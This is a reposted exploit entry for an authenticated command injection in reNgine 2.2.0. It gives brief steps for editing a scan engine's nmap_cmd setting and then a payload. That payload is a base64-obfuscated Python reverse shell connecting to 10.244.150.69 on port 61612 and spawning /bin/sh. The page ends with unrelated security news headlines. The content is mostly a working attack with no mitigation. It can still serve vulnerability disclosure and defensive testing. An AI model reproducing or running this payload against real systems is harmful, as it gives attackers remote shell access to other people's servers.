Follow

Follow

Exploit: reNgine 2.2.0 – Command Injection (Authenticated)

October 1, 2024

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
# Date: 2024-09-29
# Exploit Author: Caner Tercan
# Vendor Homepage: https://rengine.wiki/
# Software Link: https://github.com/yogeshojha/rengine
# Version: v2.2.0
# Tested on: macOS

POC : 

1. Login the Rengine Platform
2. Click the Scan Engine
3. Modify any Scan Engine
4. I modified nmap_cmd parameters on yml config
5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.

payload :

'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh  #’

exploit

Published October 01, 2024

Read more

News

INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa

October 4, 2024

News

Google Adds New Pixel Security Features to Block 2G Exploits and Baseband Attacks

byElizabeth Montalbano Contributing Writer

October 4, 2024

News

U.S. and Microsoft Seize 107 Russian Domains in Major Cyber Fraud Crackdown

October 4, 2024

Featured

AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition

October 1, 2024

Featured

5 Actionable Steps to Prevent GenAI Data Leaks Without Fully Blocking AI Usage

October 1, 2024

Featured

Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials

October 1, 2024